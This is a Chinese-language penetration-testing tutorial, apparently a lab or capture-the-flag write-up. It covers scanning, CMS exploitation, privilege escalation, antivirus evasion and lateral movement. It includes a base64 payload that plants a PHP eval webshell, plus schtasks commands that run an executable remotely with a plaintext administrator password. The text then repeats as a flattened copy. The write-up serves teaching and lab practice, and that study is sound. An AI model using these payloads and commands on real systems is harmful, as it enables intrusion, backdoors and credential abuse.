渗透测试实战教学：从信息收集到横向移动

1. 信息收集与扫描

1.1 网络扫描工具使用

使用 fscanPlus_amd64.exe 进行内网扫描：

fscanPlus_amd64.exe -h 172.20.55.32/24 -p 1-65535

扫描结果分析：

发现4台存活主机：172.20.55.32、172.20.55.33、172.20.55.34、172.20.55.233
开放端口包括：25(SMTP)、110(POP3)、22(SSH)、80(HTTP)、135/139/445(SMB)、3306(MySQL)、5985(WinRM)、8080/11333/24234(Web服务)

1.2 服务识别

172.20.55.32:80 - 空白页面
172.20.55.32:24234 - 小皮面板
172.20.55.34:80 - PHPCMS演示站
172.20.55.233:11333/8080 - 404页面
172.20.55.33/34 - Windows Server 2016 Datacenter (NetBios信息)

2. 漏洞利用

2.1 第一台目标(172.20.55.32)

攻击路径：

发现帝国CMS 7.5后台 /e/admin
验证码猜测：cslab
弱口令登录：admin:admin
后台RCE利用：

在"管理首页模板"->"增加首页方案"中插入以下payload：

$aa = base64_decode("ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA==");

点击"启用此方案"后，会在/e/admin/template/目录下生成shell.php。

提权方法：

写入SSH公钥进行连接

2.2 第二台目标(172.20.55.33)

攻击路径：

通过读取数据库配置文件获取凭据
MySQL UDF提权
使用BadPotato提权到SYSTEM
发现flag被限制访问，直接删除

2.3 第三台目标(172.20.55.34)

攻击路径：

利用PHPCMS v9.6.0任意文件上传漏洞(CVE-2018-14399)
使用Python搭建HTTP服务(80端口)存放木马文件1.txt
使用免杀技术绕过Defender(XG拟态或弱鸡Webshell免杀项目)

2.4 第五台目标(未明确IP)

攻击路径：

海洋CMS RCE漏洞利用
使用Nday poc：poc-yaml-seacmsv645-command-exec
直接写入Webshell

2.5 第七台目标

攻击路径：

利用永恒之蓝(MS17-010)漏洞
直接命令执行

3. 横向移动技术

3.1 IPC横向移动

发现10.10.10.13与10.10.10.15之间存在IPC连接
获取Administrator凭据：cyberstrike#2024.add
通过计划任务执行横向移动：

schtasks /create /tn "Run15exe" /tr "C:\\15.exe" /sc once /st 01:30 /sd 2025/02/24 /S 10.10.10.15 /RU System /u administrator /p cyberstrike#2024.add

立即执行任务：

schtasks /run /tn "Run15exe" /S 10.10.10.15 /u administrator /p cyberstrike#2024.add

删除任务：

schtasks /delete /tn "Run15exe" /S 10.10.10.15 /u administrator /p cyberstrike#2024.add

3.2 代理搭建

使用Stowaway搭建第一层代理
使用Vshell创建正向客户端(13和15)
正向连接上线Vshell

4. 免杀技术

文中提到的免杀方法：

CS用掩日项目
Vshell(直接使用)
Webshell免杀：
- XG拟态
- 弱鸡Webshell免杀项目

5. 数据库相关攻击

MySQL密码重置技术
免密登录MySQL方法
数据库文件分析(如flag.frm)
数据库内容提取(Duomi数据库)

6. 实用技巧

使用Everything工具全局搜索文件
3389端口开启与后门用户创建
定时任务分析技术
内网账号密码收集与重用

7. 注意事项

时间同步：攻击时注意目标系统时间(文中为2025/2/24 1:25:16)
防御规避：某些操作可能触发防御机制(如flag访问限制)
环境变化：靶机可能重置或配置变更(如IPC连接突然消失)
工具选择：根据场景选择合适工具(如Python2/3脚本兼容性问题)

8. 参考资源

帝国CMS后台RCE: https://mp.weixin.qq.com/s/ocP2GJ4iF3z1mv37UoJ4xw
PHPCMS漏洞利用: https://blog.csdn.net/AgonYAN/article/details/125978993
海洋CMS RCE: https://github.com/chaitin/xray/blob/master/pocs/seacmsv645-command-exec.yml

通过以上技术组合，可以完成从外网渗透到内网横向移动的完整攻击链。实际应用中需根据目标环境调整攻击策略，并注意操作的法律合规性。

渗透测试实战教学：从信息收集到横向移动 1. 信息收集与扫描 1.1 网络扫描工具使用使用 fscanPlus_amd64.exe 进行内网扫描：扫描结果分析：发现4台存活主机：172.20.55.32、172.20.55.33、172.20.55.34、172.20.55.233 开放端口包括：25(SMTP)、110(POP3)、22(SSH)、80(HTTP)、135/139/445(SMB)、3306(MySQL)、5985(WinRM)、8080/11333/24234(Web服务) 1.2 服务识别 172.20.55.32:80 - 空白页面 172.20.55.32:24234 - 小皮面板 172.20.55.34:80 - PHPCMS演示站 172.20.55.233:11333/8080 - 404页面 172.20.55.33/34 - Windows Server 2016 Datacenter (NetBios信息) 2. 漏洞利用 2.1 第一台目标(172.20.55.32) 攻击路径：发现帝国CMS 7.5后台 /e/admin 验证码猜测： cslab 弱口令登录： admin:admin 后台RCE利用：在"管理首页模板"->"增加首页方案"中插入以下payload：点击"启用此方案"后，会在 /e/admin/template/ 目录下生成 shell.php 。提权方法：写入SSH公钥进行连接 2.2 第二台目标(172.20.55.33) 攻击路径：通过读取数据库配置文件获取凭据 MySQL UDF提权使用BadPotato提权到SYSTEM 发现flag被限制访问，直接删除 2.3 第三台目标(172.20.55.34) 攻击路径：利用PHPCMS v9.6.0任意文件上传漏洞(CVE-2018-14399) 使用Python搭建HTTP服务(80端口)存放木马文件 1.txt 使用免杀技术绕过Defender(XG拟态或弱鸡Webshell免杀项目) 2.4 第五台目标(未明确IP) 攻击路径：海洋CMS RCE漏洞利用使用Nday poc： poc-yaml-seacmsv645-command-exec 直接写入Webshell 2.5 第七台目标攻击路径：利用永恒之蓝(MS17-010)漏洞直接命令执行 3. 横向移动技术 3.1 IPC横向移动发现10.10.10.13与10.10.10.15之间存在IPC连接获取Administrator凭据： cyberstrike#2024.add 通过计划任务执行横向移动：立即执行任务：删除任务： 3.2 代理搭建使用Stowaway搭建第一层代理使用Vshell创建正向客户端(13和15) 正向连接上线Vshell 4. 免杀技术文中提到的免杀方法： CS用掩日项目 Vshell(直接使用) Webshell免杀： XG拟态弱鸡Webshell免杀项目 5. 数据库相关攻击 MySQL密码重置技术免密登录MySQL方法数据库文件分析(如flag.frm) 数据库内容提取(Duomi数据库) 6. 实用技巧使用Everything工具全局搜索文件 3389端口开启与后门用户创建定时任务分析技术内网账号密码收集与重用 7. 注意事项时间同步：攻击时注意目标系统时间(文中为2025/2/24 1:25:16) 防御规避：某些操作可能触发防御机制(如flag访问限制) 环境变化：靶机可能重置或配置变更(如IPC连接突然消失) 工具选择：根据场景选择合适工具(如Python2/3脚本兼容性问题) 8. 参考资源帝国CMS后台RCE: https://mp.weixin.qq.com/s/ocP2GJ4iF3z1mv37UoJ4xw PHPCMS漏洞利用: https://blog.csdn.net/AgonYAN/article/details/125978993 海洋CMS RCE: https://github.com/chaitin/xray/blob/master/pocs/seacmsv645-command-exec.yml 通过以上技术组合，可以完成从外网渗透到内网横向移动的完整攻击链。实际应用中需根据目标环境调整攻击策略，并注意操作的法律合规性。